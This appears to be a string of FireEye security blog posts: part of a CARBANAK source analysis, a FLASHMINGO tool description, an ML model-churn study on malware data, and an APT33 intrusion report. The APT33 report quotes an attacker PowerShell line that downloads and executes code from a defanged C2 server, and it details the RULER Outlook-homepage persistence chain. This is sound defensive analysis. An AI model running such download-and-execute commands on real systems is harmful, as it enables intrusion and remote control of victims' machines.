Down the Rabbit Hole: When Having Source Code Does Not Help

In simpler backdoors, a single function evaluates the command ID received from the C2 server and dispatches control to the correct function to carry out the command. For example, a backdoor might ask its C2 server for a command and receive a response bearing the command ID 0x67. The dispatch function in the backdoor will check the command ID against several different values, including 0x67, which as an example might call a function to shovel a reverse shell to the C2 server. Figure 9 shows a control flow graph of such a function as viewed in IDA Pro. Each block of code checks against a command ID and either passes control to the appropriate command handling code, or moves on to check for the next command ID.


Figure 9: A control flow graph of a simple command handling function

In this regard, CARBANAK is an entirely different beast. It utilizes a Windows mechanism called named pipes as a means of communication and coordination across all the threads, processes, and plugins under the backdoor’s control. When the CARBANAK tasking component receives a command, it forwards the command over a named pipe where it travels through several different functions that process the message, possibly writing it to one or more additional named pipes, until it arrives at its destination where the specified command is finally handled. Command handlers may even specify their own named pipe to request more data from the C2 server. When the C2 server returns the data, CARBANAK writes the result to this auxiliary named pipe and a callback function is triggered to handle the response data asynchronously. CARBANAK’s named pipe-based tasking component is flexible enough to control both inherent command handlers and plugins. It also allows for the possibility of a local client to dispatch commands to CARBANAK without the use of a network. In fact, not only did we write such a client to aid in analysis and testing, but such a client, named botcmd.exe, was also present in the source dump.

Tom’s Perspective

Analyzing this command-handling mechanism within CARBANAK from a binary perspective was certainly challenging. It required maintaining tabs for many different views into the disassembly, and a sort of textual map of command ids and named pipe names to describe the journey of an inbound command through the various pipes and functions before arriving at its destination. Figure 10 shows the control flow graphs for seven of the named pipe message handling functions. While it was difficult to analyze this from a binary reverse engineering perspective, having compiled code combined with the features that a good disassembler such as IDA Pro provides made it less harrowing than Mike’s experience. The binary perspective saved me from having to search across several source files and deal with ambiguous function names. The disassembler features allowed me to easily follow cross-references for functions and global variables and to open multiple, related views into the code.


Figure 10: Control flow graphs for the named pipe message handling functions

Mike’s Perspective

Having source code sounds like cheat-mode for malware analysis. Indeed, source code contains much information that is lost through the compilation and linking process. Even so, CARBANAK’s tasking component (for handling commands sent by the C2 server) serves as a counter-example. Depending on the C2 protocol used and the command being processed, control flow may take divergent paths through different functions only to converge again later and accomplish the same command. Analysis required bouncing around between almost 20 functions in 5 files, often backtracking to recover information about function pointers and parameters that were passed in from as many as 18 layers back. Analysis also entailed resolving matters of C++ class inheritance, scope ambiguity, overloaded functions, and control flow termination upon named pipe usage. The overall effect was that this was difficult to analyze, even in source code.

I only embarked on this top-to-bottom journey once, to search for any surprises. The effort gave me an appreciation for the baroque machinery the authors constructed either for the sake of obfuscation or flexibility. I felt like this was done at least in part to obscure relationships and hinder timely analysis.

Anti-Analysis Mechanisms in Source Code

CARBANAK’s executable code is filled with logic that pushes hexadecimal numbers to the same function, followed by an indirect call against the returned value. This is easily recognizable as obfuscated function import resolution, wherein CARBANAK uses a simple string hash known as PJW (named after its author, P.J. Weinberger) to locate Windows API functions without disclosing their names. A Python implementation of the PJW hash is shown in Figure 11 for reference.

def pjw_hash(s):
    ctr = 0
    for i in range(len(s)):
        ctr = 0xffffffff & ((ctr << 4) + ord(s[i]))
        if ctr & 0xf0000000:
            ctr = (((ctr & 0xf0000000) >> 24) ^ ctr) & 0x0fffffff

 

    return ctr

Figure 11: PJW hash

This is used several hundred times in CARBANAK samples and impedes understanding of the malware’s functionality. Fortunately, reversers can use the flare-ida scripts to annotate the obfuscated imports, as shown in Figure 12.


Figure 12: Obfuscated import resolution annotated with FLARE's shellcode hash search

The CARBANAK authors achieved this obfuscated import resolution throughout their backdoor with relative ease using C preprocessor macros and a pre-compilation source code scanning step to calculate function hashes. Figure 13 shows the definition of the relevant API macro and associated machinery.


Figure 13: API macro for import resolution

The API macro allows the author to type API(SHLWAPI, PathFindFileNameA)(…) and have it replaced with GetApiAddrFunc(SHLWAPI, hashPathFindFileNameA)(…). SHLWAPI is a symbolic macro defined to be the constant 3, and hashPathFindFileNameA is the string hash value 0xE3685D1 as observed in the disassembly. But how was the hash defined?

The CARBANAK source code has a utility (unimaginatively named tool) that scans source code for invocations of the API macro to build a header file defining string hashes for all the Windows API function names encountered in the entire codebase. Figure 14 shows the source code for this utility along with its output file, api_funcs_hash.h.


Figure 14: Source code and output from string hash utility

When I reverse engineer obfuscated malware, I can’t help but try to theorize about how authors implement their obfuscations. The CARBANAK source code gives another data point into how malware authors wield the powerful C preprocessor along with custom code scanning and code generation tools to obfuscate without imposing an undue burden on developers. This might provide future perspective in terms of what to expect from malware authors in the future and may help identify units of potential code reuse in future projects as well as rate their significance. It would be trivial to apply this to new projects, but with the source code being on VirusTotal, this level of code sharing may not represent shared authorship. Also, the source code is accessibly instructive in why malware would push an integer as well as a hash to resolve functions: because the integer is an index into an array of module handles that are opened in advance and associated with these pre-defined integers.

Conclusion

The CARBANAK source code is illustrative of how these malware authors addressed some of the practical concerns of obfuscation. Both the tasking code and the Windows API resolution system represent significant investments in throwing malware analysts off the scent of this backdoor. Check out Part Two of this series for a round-up of antivirus evasions, exploits, secrets, key material, authorship artifacts, and network-based indicators. Part Three and Part Four are available now as well!

FLASHMINGO: The FireEye Open Source Automatic Analysis Tool for Flash

Adobe Flash is one of the most exploited software components of the last decade. Its complexity and ubiquity make it an obvious target for attackers. Public sources list more than one thousand CVEs being assigned to the Flash Player alone since 2005. Almost nine hundred of these vulnerabilities have a Common Vulnerability Scoring System (CVSS) score of nine or higher.

After more than a decade of playing cat and mouse with the attackers, Adobe is finally deprecating Flash in 2020. To the security community this move is not a surprise since all major browsers have already dropped support for Flash.

A common misconception exists that Flash is already a thing of the past; however, history has shown us that legacy technologies linger for quite a long time. If organizations do not phase Flash out in time, the security threat may grow beyond Flash's end of life due to a lack of security patches.

As malware analysts on the FLARE team, we still see Flash exploits within malware samples. We must find a compromise between the need to analyse Flash samples and the correct amount of resources to be spent on a declining product. To this end we developed FLASHMINGO, a framework to automate the analysis of SWF files. FLASHMINGO enables analysts to triage suspicious Flash samples and investigate them further with minimal effort. It integrates into various analysis workflows as a stand-alone application or can be used as a powerful library. Users can easily extend the tool's functionality via custom Python plug-ins.

Background: SWF and ActionScript3

Before we dive into the inner workings of FLASHMINGO, let’s learn about the Flash architecture. Flash’s SWF files are composed of chunks, called tags, implementing a specific functionality. Tags are completely independent from each other, allowing for compatibility with older versions of Flash. If a tag is not supported, the software simply ignores it. The main source of security issues revolves around SWF’s scripting language: ActionScript3 (AS3). This scripting language is compiled into bytecode and placed within a Do ActionScript ByteCode (DoABC) tag. If a SWF file contains a DoABC tag, the bytecode is extracted and executed by a proprietary stack-based virtual machine (VM), known as AVM2 in the case of AS3, shipped within Adobe’s Flash player. The design of the AVM2 was based on the Java VM and was similarly plagued by memory corruption and logical issues that allowed malicious AS3 bytecode to execute native code in the context of the Flash player. In the few cases where the root cause of past vulnerabilities was not in the AVM2, ActionScript code was still necessary to put the system in a state suitable for reliable exploitation. For example, by grooming the heap before triggering a memory corruption. For these reasons, FLASHMINGO focuses on the analysis of AS3 bytecode.

Tool Architecture

FLASHMINGO leverages the open source SWIFFAS library to do the heavy lifting of parsing Flash files. All binary data and bytecode are parsed and stored in a large object named SWFObject. This object contains all the information about the SWF relevant to our analysis: a list of tags, information about all methods, strings, constants and embedded binary data, to name a few. It is essentially a representation of the SWF file in an easily queryable format.

FLASHMINGO is a collection of plug-ins that operate on the SWFObject and extract interesting information. Figure 1 shows the relationship between FLASHMINGO, its plug-ins, and the SWFObject.


Figure 1: High level software structure

Several useful plug-ins covering a wide range of common analysis are already included with FLASHMINGO, including:

  • Find suspicious method names. Many samples contain method names used during development, like “run_shell” or “find_virtualprotect”. This plug-in flags samples with methods containing suspicious substrings.
  • Find suspicious constants. The presence of certain constant values in the bytecode may point to malicious or suspicious code. For example, code containing the constant value 0x5A4D may be shellcode searching for an MZ header.
  • Find suspicious loops. Malicious activity often happens within loops. This includes encoding, decoding, and heap spraying. This plug-in flags methods containing loops with interesting operations such as XOR or bitwise AND. It is a simple heuristic that effectively detects most encoding and decoding operations, and otherwise interesting code to further analyse.
  • Retrieve all embedded binary data.
  • A decompiler plug-in that uses the FFDEC Flash Decompiler. This decompiler engine, written in Java, can be used as a stand-alone library. Since FLASHMINGO is written in Python, using this plug-in requires Jython to interoperate between these two languages.

Extending FLASHMINGO With Your Own Plug-ins

FLASHMINGO is very easy to extend. Every plug-in is located in its own directory under the plug-ins directory. At start-up FLASHMINGO searches all plug-in directories for a manifest file (explained later in the post) and registers the plug-in if it is marked as active.

To accelerate development a template plug-in is provided. To add your own plug-in, copy the template directory, rename it, and edit its manifest and code. The template plug-in’s manifest, written in YAML, is shown below:

```
# This is a template for easy development
name: Template
active: no
description: copy this to kickstart development
returns: nothing

```

The most important parameters in this file are: name and active. The name parameter is used internally by FLASHMINGO to refer to it. The active parameter is a Boolean value (yes or no) indicating whether this plug-in should be active or not. By default, all plug-ins (except the template) are active, but there may be cases where a user would want to deactivate a plug-in. The parameters description and returns are simple strings to display documentation to the user. Finally, plug-in manifests are parsed once at program start. Adding new plug-ins or enabling/disabling plug-ins requires restarting FLASHMINGO.

Now for the actual code implementing the business logic. The file plugin.py contains a class named Plugin; the only thing that is needed is to implement its run method. Each plug-in receives an instance of a SWFObject as a parameter. The code will interact with this object and return data in a custom format, defined by the user. This way, the user's plug-ins can be written to produce data that can be directly ingested by their infrastructure.

Let's see how easy it is to create plug-ins by walking through one that is included, named binary_data. This plugin returns all embedded data in a SWF file by default. If the user specifies an optional parameter pattern then the plug-in searches for matches of that byte sequence within the embedded data, returning a dictionary of embedded data and the offset at which the pattern was found.

First, we define the optional argument pattern to be supplied by the user (line 2 and line 4):

Afterwards, implement a custom run method and all other code needed to support it:

This is a simple but useful plugin and illustrates how to interact with FLASHMINGO. The plug-in has a logging facility accessible through the property “ml” (line 2). By default it logs to FLASHMINGO’s main logger. If unspecified, it falls back to a log file within the plug-in’s directory. Line 10 to line 16 show the custom run method, extracting information from the SWF’s embedded data with the help of the custom _inspect_binary_data method. Note the source of this binary data: it is being read from a property named “swf”. This is the SWFObject passed to the plug-in as an argument, as mentioned previously. More complex analysis can be performed on the SWF file contents interacting with this swf object. Our repository contains documentation for all available methods of a SWFObject.

Conclusion

Even though Flash is set to reach its end of life at the end of 2020 and most of the development community has moved away from it a long time ago, we predict that we’ll see Flash being used as an infection vector for a while. Legacy technologies are juicy targets for attackers due to the lack of security updates. FLASHMINGO provides malware analysts a flexible framework to quickly deal with these pesky Flash samples without getting bogged down in the intricacies of the execution environment and file format.

Find the FLASHMINGO tool on the FireEye public GitHub Repository.

Churning Out Machine Learning Models: Handling Changes in Model Predictions

Introduction

Machine learning (ML) is playing an increasingly important role in cyber security. Here at FireEye, we employ ML for a variety of tasks such as: antivirus, malicious PowerShell detection, and correlating threat actor behavior. While many people think that a data scientist’s job is finished when a model is built, the truth is that cyber threats constantly change and so must our models. The initial training is only the start of the process and ML model maintenance creates a large amount of technical debt. Google provides a helpful introduction to this topic in their paper “Machine Learning: The High-Interest Credit Card of Technical Debt.” A key concept from the paper is the principle of CACE: change anything, change everything. Because ML models deliberately find nonlinear dependencies between input data, small changes in our data can create cascading effects on model accuracy and downstream systems that consume those model predictions. This creates an inherent conflict in cyber security modeling: (1) we need to update models over time to adjust to current threats and (2) changing models can lead to unpredictable outcomes that we need to mitigate.

Ideally, when we update a model, the only change in model outputs are improvements, e.g. fixes to previous errors. Both false negatives (missing malicious activity) and false positives (alerts on benign activity), have significant impact and should be minimized. Since no ML model is perfect, we mitigate mistakes with orthogonal approaches: whitelists and blacklists, external intelligence feeds, rule-based systems, etc. Combining with other information also provides context for alerts that may not otherwise be present. However, CACE! These integrated systems can suffer unintended side effects from a model update. Even when the overall model accuracy has increased, individual changes in model output are not guaranteed to be improvements. Introduction of new false negatives or false positives in an updated model, called churn, creates the potential for new vulnerabilities and negative interactions with cyber security infrastructure that consumes model output. In this article, we discuss churn, how it creates technical debt when considering the larger cyber security product, and methods to reduce it.

Prediction Churn

Whenever we retrain our cyber security-focused ML models, we need to able to calculate and control for churn. Formally, prediction churn is defined as the expected percent difference between two different model predictions (note that prediction churn is not the same as customer churn, the loss of customers over time, which is the more common usage of the term in business analytics). It was originally defined by Cormier et al. for a variety of applications. For cyber security applications, we are often concerned with just those differences where the newer model performs worse than the older model. Let’s define bad churn when retraining a classifier as the percentage of misclassified samples in the test set which the original model correctly classified.

Churn is often a surprising and non-intuitive concept. After all, if the accuracy of our new model is better than the accuracy of our old model, what’s the problem? Consider the simple linear classification problem of malicious red squares and benign blue circles in Figure 1. The original model, A, makes three misclassifications while the newer model, B, makes only two errors. B is the more accurate model. Note, however, that B introduces a new mistake in the lower right corner, misclassifying a red square as benign. That square was correctly classified by model A and represents an instance of bad churn. Clearly, it’s possible to reduce the overall error rate while introducing a small number of new errors which did not exist in the older model.


Figure 1: Two linear classifiers with errors highlighted in orange. The original classifier A has lower accuracy than B. However, B introduces a new error in the bottom right corner.

Practically, churn introduces two problems in our models. First, bad churn may require changes to whitelist/blacklists used in conjunction with ML models. As we previously discussed, these are used to handle the small but inevitable number of incorrect classifications. Testing on large repositories of data is necessary to catch such changes and update associated whitelists and blacklists. Second, churn may create issues for other ML models or rule-based systems which rely on the output of the ML model. For example, consider a hypothetical system which evaluates URLs using both a ML model and a noisy blacklist. The system generates an alert if

  • P(URL = ‘malicious’) > 0.9 or
  • P(URL = ‘malicious’) > 0.5 and the URL is on the blacklist

After retraining, the distribution of P(URL=‘malicious’) changes and all .com domains receive a higher score. The alert rules may need to be readjusted to maintain the required overall accuracy of the combined system. Ultimately, finding ways of reducing churn minimizes this kind of technical debt.

Experimental Setup

We’re going to explore churn and churn reduction techniques using EMBER, an open source malware classification data set. It consists of 1.1 million PE files first seen in 2017, along with their labels and features. The objective is to classify the files as either goodware or malware. For our purposes we need to construct not one model, but two, in order to calculate the churn between models. We have split the data set into three pieces:

  1. January through August is used as training data
  2. September and October are used to simulate running the model in production and retraining (test 1 in Figure 2).
  3. November and December are used to evaluate the models from step 1 and 2 (test 2 in Figure 2).


Figure 2: A comparison of our experimental setup versus the original EMBER data split. EMBER has a ten-month training set and a two-month test set. Our setup splits the data into three sets to simulate model training, then retraining while keeping an independent data set for final evaluation.

Figure 2 shows our data split and how it compares to the original EMBER data split. We have built a LightGBM classifier on the training data, which we’ll refer to as the baseline model. To simulate production testing, we run the baseline model on test 1 and record the FPs and FNs. Then, we retrain our model using both the training data and the FPs/FNs from test 1. We’ll refer to this model as the standard retrain. This is a reasonably realistic simulation of actual production data collection and model retraining. Finally, both the baseline model and the standard retrain are evaluated on test 2. The standard retrain has a higher accuracy than the baseline on test 2, 99.33% vs 99.10% respectively. However, there are 246 misclassifications made by the retrain model that were not made by the baseline or 0.12% bad churn.

Incremental Learning

Since our rationale for retraining is that cyber security threats change over time, e.g. concept drift, it’s a natural suggestion to use techniques like incremental learning to handle retraining. In incremental learning we take new data to learn new concepts without forgetting (all) previously learned concepts. That also suggests that an incrementally trained model may not have as much churn, as the concepts learned in the baseline model still exist in the new model. Not all ML models support incremental learning, but linear and logistic regression, neural networks, and some decision trees do. Other ML models can be modified to implement incremental learning. For our experiment, we incrementally trained the baseline LightGBM model by augmenting the training data with FPs and FNs from test 1 and then trained an additional 100 trees on top of the baseline model (for a total of 1,100 trees). Unlike the baseline model we use regularization (L2 parameter of 1.0); using no regularization resulted in overfitting to the new points. The incremental model has a bad churn of 0.05% (113 samples total) and 99.34% accuracy on test 2. Another interesting metric is the model’s performance on the new training data; how many of the baseline FPs and FNs from test 1 does the new model fix? The incrementally trained model correctly classifies 84% of the previous incorrect classifications. In a very broad sense, incrementally training on a previous model’s mistake provides a “patch” for the “bugs” of the old model.

Churn-Aware Learning

Incremental approaches only work if the features of the original and new model are identical. If new features are added, say to improve model accuracy, then alternative methods are required. If what we desire is both accuracy and low churn, then the most straightforward solution is to include both of these requirements when training. That’s the approach taken by Cormier et al., where samples received different weights during training in such a way as to minimize churn. We have made a few deviations in our approach: (1) we are interested in reducing bad churn (churn involving new misclassifications) as opposed to all churn and (2) we would like to avoid the extreme memory requirements of the original method. In a similar manner to Cormier et al., we want to reduce the weight, e.g. importance, of previously misclassified samples during training of a new model. Practically, the model sees making the same mistakes as the previous model as cheaper than making a new mistake. Our weighing scheme gives all samples correctly classified by the original model a weight of one and all other samples have a weight of: w = α – β |0.5 – Pold (χi)|, where Pold (χi) is the output of the old model on sample χi and αβ are adjustable hyperparameters. We train this reduced churn operator model (RCOP) using an α of 0.9, a β of 0.6 and the same training data as the incremental model. RCOP produces 0.09% bad churn, 99.38% accuracy on test 2.

Results

Figure 3 shows both accuracy and bad churn of each model on test set 2. We compare the baseline model, the standard model retrain, the incrementally learned model and the RCOP model.


Figure 3: Bad churn versus accuracy on test set 2.

Table 1 summarizes each of these approaches, discussed in detail above.

Name

Trained on

Method

Total # of trees

Baseline

train

LightGBM

1000

Standard retrain

train + FPs/FNs from baseline on test 1

LightGBM

1100

Incremental model

train + FPs/FNs from baseline on test 1

Trained 100 new trees, starting from the baseline model

1100

RCOP

train + FPs/FNs from baseline on test 1

LightGBM with altered sample weights

1100

Table 1: A description of the models tested

The baseline model has 100 fewer trees than the other models, which could explain the comparatively reduced accuracy. However, we tried increasing the number of trees which resulted in only a minor increase in accuracy of < 0.001%. The increase in accuracy for the non-baseline methods is due to the differences in data set and training methods. Both incremental training and RCOP work as expected producing less churn than the standard retrain, while showing accuracy improvements over the baseline. In general, there is usually a trend of increasing accuracy being correlated with increasing bad churn: there is no free lunch. That increasing accuracy occurs due to changes in the decision boundary, the more improvement the more changes occur. It seems reasonable the increasing decision boundary changes correlate with an increase in bad churn although we see no theoretical justification for why that must always be the case.

Unexpectedly, both the incremental model and RCOP produce more accurate models with less churn than the standard retrain. We would have assumed that given their additional constraints both models would have less accuracy with less churn. The most direct comparison is RCOP versus the standard retrain. Both models use identical data sets and model parameters, varying only by the weights associated with each sample. RCOP reduces the weight of incorrectly classified samples by the baseline model. That reduction is responsible for the improvement in accuracy. A possible explanation of this behavior is mislabeled training data. Multiple authors have suggested identifying and removing points with label noise, often using the misclassifications of a previously trained model to identify those noisy points. Our scheme, which reduces the weight of those points instead of removing them, is not dissimilar to those other noise reduction approaches which could explain the accuracy improvement.

Conclusion

ML models experience an inherent struggle: not retraining means being vulnerable to new classes of threats, while retraining causes churn and potentially reintroduces old vulnerabilities. In this blog post, we have discussed two different approaches to modifying ML model training in order to reduce churn: incremental model training and churn-aware learning. Both demonstrate effectiveness in the EMBER malware classification data set by reducing the bad churn, while simultaneously improving accuracy. Finally, we also demonstrated the novel conclusion that reducing churn in a data set with label noise can result in a more accurate model. Overall, these approaches provide low technical debt solutions to updating models that allow data scientists and machine learning engineers to keep their models up-to-date against the latest cyber threats at minimal cost. At FireEye, our data scientists work closely with the FireEye Labs detection analysts to quickly identify misclassifications and use these techniques to reduce the impact of churn on our customers.

OVERRULED: Containing a Potentially Destructive Adversary

Introduction

FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and Aerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and destructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is available within our intelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.


Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1) as shown in Figure 2.


Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

  • Username and domain
  • Computer name
  • CPU details
  • Current exe PID
  • Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success with interacting with POWERTON during this time.  The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.


Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell "DownloadString" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”.  During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a public discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).

Table 1 contains the operational timeline for the activity we analyzed.

DATE/TIME (UTC)

NOTE

INDICATOR

2017-08-15 17:06:59

APT33 – EMPIRE (Used)

8a99624d224ab3378598b9895660c890

2017-09-15 16:49:59

APT33 – PUPYRAT (Compiled)

4b19bccc25750f49c2c1bb462509f84e

2017-11-12 20:42:43

GroupA – AUT2EXE Downloader (Compiled)

95f3bea43338addc1ad951cd2d42eb6f

2017-11-14 14:55:14

GroupA – PUPYRAT (Used)

17587668ac577fce0b278420b8eb72ac

2018-01-09 19:15:16

APT33 – PUPYRAT (Compiled)

56f5891f065494fdbb2693cfc9bce9ae

2018-02-13 13:35:06

APT33 – PUPYRAT (Used)

56f5891f065494fdbb2693cfc9bce9ae

2018-05-09 18:28:43

GroupB – AUT2EXE (Compiled)

46038aa5b21b940099b0db413fa62687

2018-07-02 07:57:40

APT33 – POSHC2 (Used)

fa7790abe9ee40556fb3c5524388de0b

2018-07-16 00:33:01

GroupB – POSHC2 (Compiled)

75e680d5fddbdb989812c7ba83e7c425

2018-07-16 01:39:58

GroupB – POSHC2 (Used)

75e680d5fddbdb989812c7ba83e7c425

2018-07-16 08:36:13

GroupB – POWERTON (Used)

46038aa5b21b940099b0db413fa62687

2018-07-31 22:09:25

APT33 – POSHC2 (Used)

129c296c363b6d9da0102aa03878ca7f

2018-08-06 16:27:05

GroupB – POSHC2 (Compiled)

fca0ad319bf8e63431eb468603d50eff

2018-08-07 05:10:05

GroupB – POSHC2 (Used)

75e680d5fddbdb989812c7ba83e7c425

2018-08-29 18:14:18

APT33 – POSHC2 (Used)

5832f708fd860c88cbdc088acecec4ea

2018-10-09 16:02:55

APT33 – POSHC2 (Used)

8d3fe1973183e1d3b0dbec31be8ee9dd

2018-10-09 16:48:09

APT33 – POSHC2 (Used)

48d1ed9870ed40c224e50a11bf3523f8

2018-10-11 21:29:22

GroupB – POWERTON (Used)

8be06571e915ae3f76901d52068e3498

2018-12-13 11:00:00

GroupB – POWERTON (Identified)

99649d58c0d502b2dfada02124b1504c

Table 1: Operational Timeline

Outlook and Implications

If the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.

